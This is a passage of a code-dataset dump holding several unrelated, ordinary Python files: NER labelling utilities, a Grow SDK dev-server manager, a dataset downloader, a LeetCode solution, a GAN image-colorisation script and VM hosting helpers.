#select the following row but only if it needs filling \n requiresfillidx=df.loc[startlabelidx+1, \"labels\"][df[\"labels\"].isnull()].index\n #fill it with the prior row's values +1 (because it will be a \"continue\" token corresponding to prior start token)\n df.loc[requiresfillidx, \"labels\"]=list(df.loc[requiresfillidx-1, 'labels']+1)\n #now the only missing labels follow even numbers, so use usual ffill method.\n df.ffill(inplace=True)\n return list(df[\"labels\"].astype(int))\n \n#iterate through documents to propagate labels \ndef encode_tags(tags, encodings, tag2id):\n #turns the labels into a list of lists of tag-id's \n labels = [[tag2id[tag] for tag in doc] for doc in tags]\n encoded_labels = []\n #iterate through each document's labels and offset mapping\n i=0\n for doc_labels, doc_offset in zip(labels, encodings.offset_mapping):\n if i%10000==0: \n print(\"processing subdocument\", i) \n encoded_labels.append(fill_labels(doc_labels, doc_offset))\n i=i+1\n return encoded_labels\n \ndef remove_unicode_specials(inputstring):\n newstring=inputstring.replace(\"\\uFFFD\", \"\")\n return newstring\n\n\n#helper functions to do inference and export results to prodigy\ndef singledocinference(doc, classifier, inferenceid2tag): \n '''runs a single document through inference and processes the output dictionary to work for prodigy''' \n 
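# classifier is presumably a transformers token-classification pipeline; each returned entity dict is trimmed to start/end/label below\n 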
pipelineoutput=classifier(doc)\n docdict={} \n docdict[\"text\"]=doc\n spanlist=[] \n for dictionary in pipelineoutput:\n dictionary[\"start\"]=int(dictionary[\"start\"])\n dictionary[\"end\"]=int(dictionary[\"end\"])\n dictionary.pop('score', None)\n dictionary.pop('word', None)\n dictionary[\"label\"]=inferenceid2tag[dictionary['entity']]\n dictionary.pop(\"entity\")\n spanlist.append(dictionary)\n docdict[\"spans\"]=spanlist\n return docdict \n \ndef multipledocinference(doclist, classifier, outputjsonpath, inferenceid2tag): \n '''Calls singledoc inference multiple times, to do multiple doc inference, \n and saves multiline jsonl filepath for prodigy'''\n docdictlist=[]\n for doc in doclist: \n docdict=singledocinference(doc, classifier, inferenceid2tag)\n #print(docdict)\n docdictlist.append(docdict)\n print('saving jsonl file to ', outputjsonpath)\n with open(outputjsonpath, 'w') as f:\n for item in docdictlist:\n f.write(json.dumps(item) + \"\\n\")\n\ndef select_longest_regex_finding(regex_one, regex_two, note):\n \"\"\"\n Return the longest regex match of the first finding of regex in note.\n\n Parameters\n regex_one: str, regular expression to search through note.\n regex_two: str, regular expression to search through note if we don't find any matches for regex_one.\n note: str, string to be searched through with regex.\n\n Returns\n str, longest regex match of the first finding of regex in note. If no\n regex matches are found, returns None.\n \"\"\"\n if (regex_one != None and note != None):\n findings = re.findall(regex_one, note, flags=re.IGNORECASE)\n if (len(findings) > 0):\n return max(findings[0], key=len)\n else:\n if (regex_two != None):\n findings = re.findall(regex_two, note, flags=re.IGNORECASE)\n if (len(findings) > 0):\n return max(findings[0], key=len)\n else:\n return None\n else:\n return None\n\n\ndef find_sandwiched_regex_finding_indices(regex_curr, regex_next, note, final_entity_width):\n \"\"\"\n Searches 'note' for the longest regex match of the regular expression\n regex_curr, and the longest regex match of regex_next that occurs after\n regex_curr's match. Returns the end index of regex_curr's match and\n the start index of regex_next's match. 
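Together the two indices delimit the free-text finding that sits between the two headings. 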
If \n regex_next is set to None, returns the content after regex_curr's match\n to the end of note.\n \n Parameters\n regex_curr: str, a regular expression to search through the note\n regex_next: str, a regular expression to search through the note, or None\n if we want to search to the end of the note.\n note: str, a string that will be searched using the two regexes\n final_entity_width: int, specifying how many characters should be in the final entity\n\n Returns:\n int, int: index of the end of the longest regex match of regex_curr,\n index of the start of the longest regex match of regex_next after\n the end of regex_curr's match.\n \"\"\"\n if (regex_curr != None and note != None):\n curr_findings = re.findall(regex_curr, note, flags=re.IGNORECASE)\n\n # Only proceed if we find regex matches\n if (len(curr_findings) > 0):\n # re.findall sometimes returns lists of strings, sometimes lists of tuples\n if (isinstance(curr_findings[0], str)):\n curr_heading = max(curr_findings, key=len)\n else:\n curr_heading = max(curr_findings[0], key=len)\n curr_heading_end_ind = note.index(curr_heading) + len(curr_heading)\n\n updated_note = remove_longest_regex_finding(regex_curr, note)\n\n # If regex_next != None, we are going to find the sandwiched finding\n if (regex_next != None):\n next_findings = re.findall(regex_next, updated_note, flags=re.IGNORECASE)\n\n if (len(next_findings) > 0):\n if (isinstance(next_findings[0], str)):\n next_heading = max(next_findings, key=len)\n else:\n next_heading = max(next_findings[0], key=len)\n next_heading_start_ind = curr_heading_end_ind + updated_note.index(next_heading)\n else:\n next_heading_start_ind = len(note)\n # if regex_next == None, we return the text up to the end of the note\n else:\n next_heading_start_ind = curr_heading_end_ind + final_entity_width\n\n return curr_heading_end_ind, next_heading_start_ind\n \n return None, None\n\n\ndef select_sandwiched_regex_finding(regex_curr, regex_next, note, final_entity_width):\n \"\"\"\n Searches 'note' for the longest regex match of the regular expression\n regex_curr, and the longest regex match of regex_next that occurs after\n regex_curr's match. Returns the content between the two matches. If \n regex_next is set to None, returns the content after regex_curr's match\n to the end of note.\n \n Parameters\n regex_curr: str, a regular expression to search through the note\n regex_next: str, a regular expression to search through the note\n note: str, a string that will be searched using the two regexes\n final_entity_width: int, specifying how many characters should be in the final entity\n\n Returns:\n str, text between the longest regex matches of regex_curr and regex_next.\n If regex_next is None, returns the text from the end of regex_curr's match\n to the end of the string.\n \"\"\"\n curr_heading_end_ind, next_heading_start_ind = find_sandwiched_regex_finding_indices(regex_curr, regex_next, note, final_entity_width)\n if (curr_heading_end_ind != None and next_heading_start_ind != None):\n finding = note[curr_heading_end_ind:next_heading_start_ind]\n if (finding.isspace()):\n return None\n return finding \n return None\n\ndef remove_sandwiched_regex_finding(regex_curr, regex_next, note, final_entity_width):\n \"\"\"\n Searches 'note' for the longest regex match of the regular expression\n regex_curr, and the longest regex match of regex_next that occurs after\n regex_curr's match. 
Returns the content from the start of regex_next's match\n onwards.\n \n Parameters\n regex_curr: str, a regular expression to search through the note\n regex_next: str, a regular expression to search through the note\n note: str, a string that will be searched using the two regexes\n final_entity_width: int, specifying how many characters should be in the final entity\n\n Returns:\n str, text after longest regex match of regex_next\n \"\"\"\n curr_heading_end_ind, next_heading_start_ind = find_sandwiched_regex_finding_indices(regex_curr, regex_next, note, final_entity_width)\n if (curr_heading_end_ind != None and next_heading_start_ind != None):\n finding = note[next_heading_start_ind:]\n return finding \n return None\n\ndef remove_longest_regex_finding(regex, note):\n \"\"\"\n Finds the longest match of 'regex' within 'note', and returns a modified\n version of 'note' with the sequence before and including the longest match\n removed.\n\n Parameters:\n - regex: str, a regular expression to search through note\n - note: str, a string that will be searched using regex\n\n Returns:\n - str, version of note with text up to and including the longest regex match\n removed. If no regex match is found, this returns note.\n \"\"\"\n if (regex != None and note != None):\n findings = re.findall(regex, note, flags=re.IGNORECASE)\n if (len(findings) > 0):\n if (isinstance(findings[0], str)):\n longest_finding = max(findings, key=len)\n else:\n longest_finding = max(findings[0], key=len) \n longest_match_len = len(longest_finding)\n if (longest_match_len > 0):\n start_ind = note.index(longest_finding)\n end_ind = start_ind + longest_match_len\n return note[end_ind:]\n else:\n return note\n return note\n\n#build function that turns cell into a regex and searches text for it, returning the span of the match \ndef findoffsetlabel(regextext, note, offset): \n spanlist=[]\n if ((note != None) and len(note) > 0):\n try: \n regextext=str.strip(regextext)\n regex=re.compile(re.escape(\" \"+regextext)) #regex escape? 
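(re.escape makes any regex metacharacters in the entity text match literally, and the prepended space keeps the match anchored at a word boundary)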
\n except: \n return []\n for m in regex.finditer(note): \n spanlist.append((m.start()+1+offset, m.end()+offset))\n return spanlist \n\n\ndef defaultlabels(doclength): \n return '['+int(doclength)*\"'O',\"+']'","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":19778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"489252841","text":"import logging\nlogging.basicConfig(level=logging.INFO, format='%(message)s')\n\nfrom grow.common import utils\nfrom grow.pods.preprocessors import translation as translation_preprocessor\nfrom grow.pods.preprocessors.file_watchers import file_watchers\nfrom grow.server import handlers\nfrom grow.server import main as main_lib\nfrom wsgiref import simple_server\nimport atexit\nimport multiprocessing\nimport os\nimport sys\nimport threading\nimport yaml\nimport webbrowser\n\n_servers = {}\n_config_path = '{}/.grow/servers.yaml'.format(os.environ['HOME'])\n\n\ndef _loop_watching_for_changes(pod, file_watchers_to_preprocessors, quit_event):\n while not quit_event.is_set():\n for file_watcher, preprocessors in file_watchers_to_preprocessors.iteritems():\n if file_watcher.has_changes():\n [preprocessor.run() for preprocessor in preprocessors]\n quit_event.wait(timeout=1.5)\n\n\ndef _start(pod, host=None, port=None, open_browser=False):\n root = pod.root\n preprocessors = pod.list_preprocessors()\n\n # Add the translation preprocessor as a builtin.\n preprocessors.insert(0, translation_preprocessor.TranslationPreprocessor(pod=pod))\n\n try:\n # TODO(jeremydw): Custom server logs.\n # logger_format = ('[%(time)s] \"%(REQUEST_METHOD)s %(REQUEST_URI)s\" %(status)s'\n # if use_simple_log_format else None)\n\n # Map directory names to preprocessors.\n dirs_to_preprocessors = {}\n for preprocessor in preprocessors:\n for watched_dir in preprocessor.list_watched_dirs():\n if watched_dir not in dirs_to_preprocessors:\n dirs_to_preprocessors[watched_dir] = []\n dirs_to_preprocessors[watched_dir].append(preprocessor)\n\n # Run all preprocessors for the pod.\n [preprocessor.first_run() for preprocessor in preprocessors]\n\n # Create file watchers for each preprocessor.\n file_watchers_to_preprocessors = {}\n for dirname, preprocessors in dirs_to_preprocessors.iteritems():\n dirname = os.path.join(pod.root, dirname.lstrip('/'))\n change_watcher = file_watchers.get_file_watcher([dirname])\n change_watcher.start()\n file_watchers_to_preprocessors[change_watcher] = preprocessors\n\n # Start a thread where preprocessors can run if there are changes.\n quit_event = threading.Event()\n change_watcher_thread = threading.Thread(\n target=_loop_watching_for_changes,\n args=(pod, file_watchers_to_preprocessors, quit_event))\n change_watcher_thread.start()\n\n # Create the development server.\n root = os.path.abspath(os.path.normpath(root))\n handlers.set_pod_root(root)\n app = main_lib.application\n port = 8080 if port is None else port\n host = 'localhost' if host is None else host\n httpd = simple_server.make_server(host, int(port), app)\n except:\n logging.exception('Failed to start server.')\n quit_event.set()\n change_watcher_thread.join()\n sys.exit()\n\n try:\n root_path = pod.get_root_path()\n url = 'http://{}:{}{}'.format(host, port, root_path)\n logging.info('---')\n logging.info(utils.colorize('{blue}The Grow SDK is experimental.{/blue} Expect backwards incompatibility until v0.1.0.'))\n logging.info('Thank you for testing and contributing! 
Visit http://growsdk.org for resources.')\n logging.info('---')\n logging.info('Serving pod {} => {}'.format(root, url))\n text = '{green}READY!{/green} Press Ctrl+C to shut down. Tip: Use --open to open a browser automatically.'\n logging.info(utils.colorize(text))\n\n def start_browser(server_ready_event):\n server_ready_event.wait()\n if open_browser:\n webbrowser.open(url)\n\n server_ready_event = threading.Event()\n browser_thread = threading.Thread(target=start_browser, args=(server_ready_event,))\n browser_thread.start()\n server_ready_event.set()\n httpd.serve_forever()\n browser_thread.join()\n\n except KeyboardInterrupt:\n logging.info('Shutting down...')\n httpd.server_close()\n\n # Clean up once serve exits.\n quit_event.set()\n change_watcher_thread.join()\n sys.exit()\n\n\ndef start(pod, host=None, port=None, open_browser=False, use_subprocess=False):\n root = pod.root\n if root in _servers:\n logging.error('Server already started for pod: {}'.format(root))\n return\n\n if not use_subprocess:\n _start(pod, host=host, port=port, open_browser=open_browser)\n return\n\n server_process = multiprocessing.Process(target=_start, args=(root, host, port, open_browser))\n server_process.start()\n _servers[root] = server_process\n return server_process\n\n\ndef stop(root):\n process = _servers.pop(root, None)\n if process is None:\n return\n try:\n process.terminate()\n logging.info('Stopped server for pod: {}'.format(root))\n except AttributeError:\n logging.info('Server already stopped for pod: {}'.format(root))\n\n\n@atexit.register\ndef stop_all():\n for root in _servers.keys():\n stop(root)\n\n\ndef write_config(config):\n path = os.path.dirname(_config_path)\n if not os.path.exists(path):\n os.makedirs(path)\n content = yaml.dump(config, default_flow_style=False)\n fp = open(_config_path, 'w')\n fp.write(content)\n fp.close()\n\n\nclass PodServer(object):\n\n def __init__(self, root, port=8000, revision_status=None):\n self.root = root\n self.port = port\n self.revision_status = revision_status\n self.server_status = 'off'\n self._process = None\n\n def start(self):\n self._process = start(self.root, port=self.port, use_subprocess=True)\n self.server_status = 'on'\n logging.info('Started server for pod: {}'.format(self.root))\n\n def stop(self):\n self.server_status = 'off'\n try:\n self._process.terminate()\n logging.info('Stopped server for pod: {}'.format(self.root))\n except AttributeError:\n logging.info('Server already stopped.')\n\n def set_root(self, root):\n self.root = root\n\n def set_port(self, port):\n self.port = port\n\n @property\n def is_started(self):\n return self.server_status == 'on'\n\n @classmethod\n def load(cls):\n servers = []\n try:\n fp = open(_config_path)\n for server in yaml.load(fp)['servers']:\n servers.append(cls(\n server['root'],\n port=server.get('port'),\n revision_status=server.get('revision_status')\n ))\n except IOError:\n # .grow/servers.yaml does not exist.\n pass\n return servers\n","sub_path":"grow/server/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":6313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"245561056","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /root/project/datamaestro/download/single.py\n# Compiled at: 2020-02-25 07:34:23\n# Size of source mod 2**32: 3689 bytes\nimport logging, shutil, tarfile, io, tempfile, 
gzip\nimport os.path as op\nimport os, urllib3\nfrom pathlib import Path\nfrom tempfile import NamedTemporaryFile\nimport re\nfrom docstring_parser import parse\nfrom datamaestro.utils import rm_rf\nfrom datamaestro.stream import Transform\nfrom datamaestro.download import Download\n\ndef open_ext(*args, **kwargs):\n \"\"\"Opens a file according to its extension\"\"\"\n name = args[0]\n if name.endswith('.gz'):\n return (gzip.open)(*args, *kwargs)\n return (io.open)(*args, **kwargs)\n\n\nclass SingleDownload(Download):\n\n def __init__(self, filename):\n super().__init__(re.sub('\\\\..*$', '', filename))\n self.name = filename\n\n @property\n def path(self):\n return self.definition.datapath / self.name\n\n def prepare(self):\n return self.path\n\n def download(self, force=False):\n if not self.path.is_file():\n self._download(self.path)\n\n\nclass filedownloader(SingleDownload):\n\n def __init__(self, filename, url, transforms=None):\n \"\"\"Downloads a file given by a URL\n\n Args:\n filename: The filename within the data folder; the variable name corresponds to the filename without the extension\n url: The URL to download\n transforms: Transform the file before storing it\n \"\"\"\n super().__init__(filename)\n self.url = url\n p = urllib3.util.parse_url(self.url)\n path = Path(Path(p.path).name)\n self.transforms = transforms if transforms else Transform.createFromPath(path)\n\n def _download(self, destination):\n logging.info('Downloading %s into %s', self.url, destination)\n dir = op.dirname(destination)\n os.makedirs(dir, exist_ok=True)\n with self.context.downloadURL(self.url) as (file):\n if self.transforms:\n logging.info('Transforming file')\n with self.transforms(file.path.open('rb')) as (stream):\n with destination.open('wb') as (out):\n shutil.copyfileobj(stream, out)\n else:\n logging.info('Keeping original downloaded file %s', file.path)\n (shutil.copy if file.keep else shutil.move)(file.path, destination)\n logging.info('Created file %s' % destination)\n\n\nclass concatdownload(SingleDownload):\n __doc__ = 'Concatenate all files in an archive'\n\n def __init__(self, filename, url, transforms=None):\n \"\"\"Concat the files in an archive\n\n Args:\n filename: The filename within the data folder; the variable name corresponds to the filename without the extension\n url: The URL to download\n transforms: Transform the file before storing it\n \"\"\"\n super().__init__(filename)\n self.url = url\n self.transforms = transforms\n\n def _download(self, destination):\n with self.context.downloadURL(self.url) as (dl):\n with tarfile.open(dl.path) as (archive):\n destination.parent.mkdir(parents=True, exist_ok=True)\n with open(destination, 'wb') as (out):\n for tarinfo in archive:\n if tarinfo.isreg():\n transforms = self.transforms or Transform.createFromPath(Path(tarinfo.name))\n logging.debug('Processing file %s', tarinfo.name)\n with transforms(archive.fileobject(archive, tarinfo)) as (fp):\n shutil.copyfileobj(fp, out)","sub_path":"pycfiles/datamaestro-0.6.13-py3-none-any/single.cpython-37.py","file_name":"single.cpython-37.py","file_ext":"py","file_size_in_byte":3815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"345347373","text":"# 761. 
Special Binary String\n\n# Special binary strings are binary strings with the following two properties:\n\n# The number of 0's is equal to the number of 1's.\n# Every prefix of the binary string has at least as many 1's as 0's.\n# Given a special string S, a move consists of choosing two consecutive,\n# non-empty, special substrings of S, and swapping them.\n\n# (Two strings are consecutive if the last character of the first string\n# is exactly one index before the first character of the second string.)\n\n# At the end of any number of moves, what is the lexicographically largest resulting string possible?\n\n# Example 1:\n# Input: S = \"11011000\"\n# Output: \"11100100\"\n\n# Explanation:\n# The strings \"10\" [occuring at S[1]] and \"1100\" [at S[3]] are swapped.\n# This is the lexicographically largest string possible after some number of swaps.\n# Note:\n\n# S has length at most 50.\n# S is guaranteed to be a special binary string as defined above.\n\n\nclass MakeLargestSpecial:\n\n # Just 4 steps:\n\n # Split S into several special strings (as many as possible).\n # Special string starts with 1 and ends with 0. Recursion on the middle part.\n # Sort all special strings in lexicographically largest order.\n # Join and output all strings.\n # Updated:\n\n # The middle part of a special string may not be another special string. But in my recursion it is.\n # For example, 1M0 is a splitted special string. M is its middle part and it must be another special string.\n\n # Because:\n\n # The number of 0's is equal to the number of 1's in M\n # If there is a prefix P of Mwhich has one less 1's than 0's,\n # 1P will make up a special string. 1P will be found as special string before 1M0 in my solution.\n # It means that every prefix of M has at least as many 1's as 0's.\n # Based on 2 points above, M is a special string.\n\n def doit(self, S):\n \"\"\"\n :type S: str\n :rtype: str\n \"\"\"\n def largestSpecialString(s):\n count, j = 0, 0\n res = []\n\n for i in range(len(s)):\n\n count += 1 if s[i] == '1' else -1\n if count == 0:\n res.append('1' + largestSpecialString(s[j+1:i]) + '0')\n j = i + 1\n\n return ''.join(sorted(res, reverse=1))\n\n return largestSpecialString(S)\n\n\nimport functools\n\nclass Solution:\n\n def compareTwoNumbers(self, num1, num2):\n if num2 + num1 > num1 + num2:\n return 1\n\n if num2 + num1 == num1 + num2:\n return 0\n\n return -1\n\n def makeLargestSpecial(self, s):\n \"\"\"\n :type S: str\n :rtype: str\n \"\"\"\n\n if len(s) is 2:\n return s\n\n sum = 0\n start_index = 0\n substrings = []\n\n for index, c in enumerate(s):\n\n if c is '1':\n sum += 1\n else:\n sum -= 1\n\n if sum is 0:\n substrings.append(s[start_index: index + 1])\n start_index = index + 1\n\n if len(substrings) is 1:\n return \"1\" + self.makeLargestSpecial(substrings[0][1:-1]) + \"0\"\n\n else:\n results = []\n for sub in substrings:\n results.append(self.makeLargestSpecial(sub))\n\n sorted_nums = sorted(results, key=functools.cmp_to_key(self.compareTwoNumbers))\n result = ''\n\n for r in sorted_nums:\n result = result + r\n\n return result\n\n\nif __name__ == \"__main__\":\n\n res = MakeLargestSpecial().doit(\"11011000\")\n\n pass\n","sub_path":"PythonLeetcode/Leetcode/761_SpecialBinaryString.py","file_name":"761_SpecialBinaryString.py","file_ext":"py","file_size_in_byte":3580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"590506616","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 27 11:26:58 
2018\n\n@author: tinghaoli\n\"\"\"\n\nimport argparse\nimport os\nimport random\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\n\nimport matplotlib.pyplot as plt\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--batchSize', type=int, default=10, help='input batch size')\nparser.add_argument('--imageSize', type=int, default=64, help='the height / width of the input image to network')\nparser.add_argument('--nz', type=int, default=3, help='size of the latent z vector')\nparser.add_argument('--ngf', type=int, default=64)\nparser.add_argument('--ndf', type=int, default=64)\nparser.add_argument('--niter', type=int, default=10, help='number of epochs to train for')\nparser.add_argument('--lr', type=float, default=0.0002, help='learning rate, default=0.0002')\nparser.add_argument('--beta1', type=float, default=0.5, help='beta1 for adam. default=0.5')\nparser.add_argument('--cuda', action='store_true', help='enables cuda')\nparser.add_argument('--ngpu', type=int, default=0, help='number of GPUs to use')\nparser.add_argument('--netG', default='', help=\"path to netG (to continue training)\")\nparser.add_argument('--netD', default='', help=\"path to netD (to continue training)\")\nparser.add_argument('--outf', default='./output', help='folder to output images and model checkpoints')\nparser.add_argument('--manualSeed', type=int, help='manual seed')\n\nopt = parser.parse_args()\n\ntransform = transforms.Compose(\n [\n transforms.Resize((opt.imageSize,opt.imageSize)),\n #transforms.Grayscale(3),\n transforms.ToTensor(),\n transforms.Normalize((0.5,0.5,0.5), (0.5,0.5,0.5)),\n ])\n\ntrainset = dset.ImageFolder(root='/Users/tinghaoli/Desktop/Image', \n transform=transform)\n\nassert trainset\n\ndataloader = torch.utils.data.DataLoader(trainset, batch_size=opt.batchSize,\n shuffle=True, num_workers=2)\n\n\n\nfor i, data in enumerate(dataloader, 0):\n if i ==0:\n print(data)\n break\n \ndevice = torch.device(\"cuda:0\" if opt.cuda else \"cpu\")\nngpu = int(opt.ngpu)\nnz = int(opt.nz)\nngf = int(opt.ngf)\nndf = int(opt.ndf)\nnc = 3\n\ndef weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n m.weight.data.normal_(0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n m.weight.data.normal_(1.0, 0.02)\n m.bias.data.fill_(0)\n\nclass Generator(nn.Module):\n def __init__(self, ngpu):\n super(Generator, self).__init__()\n self.ngpu = ngpu\n self.main = nn.Sequential(\n # input is Z, going into a convolution\n nn.Conv2d( nz, ngf * 8, 2, 1, 0, bias=True),\n nn.BatchNorm2d(ngf * 8),\n nn.ReLU(True),\n # state size. (ngf*8) x 4 x 4\n nn.Conv2d(ngf * 8, ngf * 4, 2, 1, 1, bias=True),\n nn.BatchNorm2d(ngf * 4),\n nn.ReLU(True),\n # state size. (ngf*4) x 8 x 8\n nn.Conv2d(ngf * 4, ngf * 2, 2, 1, 0, bias=True),\n nn.BatchNorm2d(ngf * 2),\n nn.ReLU(True),\n # state size. (ngf*2) x 16 x 16\n# nn.Conv2d(ngf * 2, ngf, 2, 1, 1, bias=True),\n# nn.BatchNorm2d(ngf),\n# nn.ReLU(True),\n # state size. (ngf) x 32 x 32\n nn.Conv2d( ngf*2, nc, 2, 1, 1, bias=True),\n nn.Tanh()\n # state size. 
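            # Reviewer note (added comment, not in the original source): unlike a
            # textbook DCGAN generator built from ConvTranspose2d upsampling
            # layers, this Generator stacks plain Conv2d layers, because its
            # input is a full-resolution 3-channel grayscale image to be
            # colorized (see the training loop below, where `grey` is fed to
            # netG) rather than a 1x1 latent noise vector; the final Tanh keeps
            # outputs in [-1, 1], matching the Normalize((0.5,0.5,0.5),
            # (0.5,0.5,0.5)) preprocessing applied to the dataset.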
(nc) x 64 x 64\n )\n\n def forward(self, input):\n if input.is_cuda and self.ngpu > 1:\n output = nn.parallel.data_parallel(self.main, input, range(self.ngpu))\n else:\n output = self.main(input)\n return output\n\n \n \nnetG = Generator(ngpu).to(device)\nnetG.apply(weights_init)\nif opt.netG != '':\n netG.load_state_dict(torch.load(opt.netG))\nprint(netG)\n\n\nclass Discriminator(nn.Module):\n def __init__(self, ngpu):\n super(Discriminator, self).__init__()\n self.ngpu = ngpu\n self.main = nn.Sequential(\n # input is (nc) x 64 x 64\n nn.Conv2d(nc, ndf, 4, 2, 1, bias=True),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf) x 32 x 32\n nn.Conv2d(ndf, ndf * 2, 4, 2, 1, bias=True),\n nn.BatchNorm2d(ndf * 2),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf*2) x 16 x 16\n nn.Conv2d(ndf * 2, ndf * 4, 4, 2, 1, bias=True),\n nn.BatchNorm2d(ndf * 4),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf*4) x 8 x 8\n nn.Conv2d(ndf * 4, ndf * 8, 4, 2, 1, bias=True),\n nn.BatchNorm2d(ndf * 8),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf*8) x 4 x 4\n nn.Conv2d(ndf * 8, 1, 4, 1, 0, bias=True),\n nn.Sigmoid()\n )\n\n def forward(self, input):\n if input.is_cuda and self.ngpu > 1:\n output = nn.parallel.data_parallel(self.main, input, range(self.ngpu))\n else:\n output = self.main(input)\n\n return output.view(-1, 1).squeeze(1)\n\n\n\n\nnetD = Discriminator(ngpu).to(device)\nnetD.apply(weights_init)\nif opt.netD != '':\n netD.load_state_dict(torch.load(opt.netD))\nprint(netD)\n\n\ncriterion = nn.BCELoss()\n\n\nreal_label = 1\nfake_label = 0\n\n# setup optimizer\noptimizerD = optim.Adam(netD.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))\noptimizerG = optim.Adam(netG.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))\n\n\nfor epoch in range(opt.niter):\n for i, data in enumerate(dataloader, 0):\n ############################\n # (1) Update D network: maximize log(D(x)) + log(1 - D(G(z)))\n ###########################\n \n # train with real\n netD.zero_grad()\n real_cpu = data[0].to(device)\n batch_size = real_cpu.size(0)\n label = torch.full((batch_size,), real_label, device=device)\n\n output = netD(real_cpu)\n errD_real = criterion(output, label)\n errD_real.backward()\n D_x = output.mean().item()\n\n # train with fake\n# noise = torch.randn(batch_size, nz, 1, 1, device=device)\n# fake = netG(noise)\n # 1 means only chanle\n grey = torch.FloatTensor(batch_size,3,opt.imageSize,opt.imageSize).zero_()\n \n # Y' = 0.299 R + 0.587 G + 0.114 B \n grey[:,0,:,:] = real_cpu[0:batch_size,0,:,:]*0.299 + real_cpu[0:batch_size,1,:,:] * 0.587 + real_cpu[0:batch_size,2,:,:] * 0.114\n grey[:,1,:,:] = grey[:,0,:,:]\n grey[:,2,:,:] = grey[:,0,:,:]\n\n\n fake = netG(grey)\n \n \n label.fill_(fake_label)\n output = netD(fake.detach())\n errD_fake = criterion(output, label)\n errD_fake.backward()\n D_G_z1 = output.mean().item()\n \n errD = errD_real + errD_fake\n optimizerD.step()\n\n ############################\n # (2) Update G network: maximize log(D(G(z)))\n ###########################\n netG.zero_grad()\n label.fill_(real_label) # fake labels are real for generator cost\n output = netD(fake)\n errG = criterion(output, label)\n errG.backward()\n D_G_z2 = output.mean().item()\n optimizerG.step()\n\n print('[%d/%d][%d/%d] Loss_D: %.4f Loss_G: %.4f D(x): %.4f D(G(z)): %.4f / %.4f'\n % (epoch, opt.niter, i, len(dataloader),\n errD.item(), errG.item(), D_x, D_G_z1, D_G_z2))\n \n# if i % 100 == 0:\n# vutils.save_image(real_cpu,\n# '%s/real_samples.png' % opt.outf,\n# normalize=True)\n# fake = 
netG(fixed_noise)\n# vutils.save_image(fake.detach(),\n# '%s/fake_samples_epoch_%03d.png' % (opt.outf, epoch),\n# normalize=True)\n\n # do checkpointing\n #torch.save(netG.state_dict(), '%s/netG_epoch_%d.pth' % (opt.outf, epoch))\n #torch.save(netD.state_dict(), '%s/netD_epoch_%d.pth' % (opt.outf, epoch))\n\n\n\n\n\n\n#plt.imshow(im0c)\n#plt.show()\n\n\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"498264788","text":"import logging\nfrom oca.pool import WrongIdError\n\nfrom hosting.models import UserHostingKey, VMDetail\nfrom opennebula_api.serializers import VirtualMachineSerializer\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_all_public_keys(customer):\n \"\"\"\n Returns all the public keys of the user\n :param customer: The customer whose public keys are needed\n :return: A list of public keys\n \"\"\"\n return UserHostingKey.objects.filter(user_id=customer.id).values_list(\n \"public_key\", flat=True)\n\n\ndef get_or_create_vm_detail(user, manager, vm_id):\n \"\"\"\n Returns VMDetail object related to given vm_id. Creates the object\n if it does not exist\n\n :param vm_id: The ID of the VM which should be greater than 0.\n :param user: The CustomUser object that owns this VM\n :param manager: The OpenNebulaManager object\n :return: The VMDetail object. None if vm_id is less than or equal to 0.\n Also, for the cases where the VMDetail does not exist and we can not\n fetch data about the VM from OpenNebula, the function returns None\n \"\"\"\n if vm_id <= 0:\n return None\n try:\n vm_detail_obj = VMDetail.objects.get(vm_id=vm_id)\n except VMDetail.DoesNotExist:\n try:\n vm_obj = manager.get_vm(vm_id)\n except (WrongIdError, ConnectionRefusedError) as e:\n logger.error(str(e))\n return None\n vm = VirtualMachineSerializer(vm_obj).data\n vm_detail_obj = VMDetail.objects.create(\n user=user, vm_id=vm_id, disk_size=vm['disk_size'],\n cores=vm['cores'], memory=vm['memory'],\n configuration=vm['configuration'], ipv4=vm['ipv4'],\n ipv6=vm['ipv6']\n )\n return vm_detail_obj\n\n\ndef get_vm_price(cpu, memory, disk_size):\n \"\"\"\n A helper function that computes price of a VM from given cpu, ram and\n ssd parameters\n\n :param cpu: Number of cores of the VM\n :param memory: RAM of the VM\n :param disk_size: Disk space of the VM\n :return: The price of the VM\n \"\"\"\n return (cpu * 5) + (memory * 2) + (disk_size * 0.6)\n","sub_path":"utils/hosting_utils.py","file_name":"hosting_utils.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"270077661","text":"from aiohttp import ClientSession, TCPConnector\nimport asyncio\n\n\ndef async_fetcher(urls, headers):\n async def fetch(url, session):\n async with session.get(url) as response:\n return await response.json()\n\n # async def bound_fetch(sem, url, session):\n # # Getter function with semaphore.\n # async with sem:\n # await fetch(url, 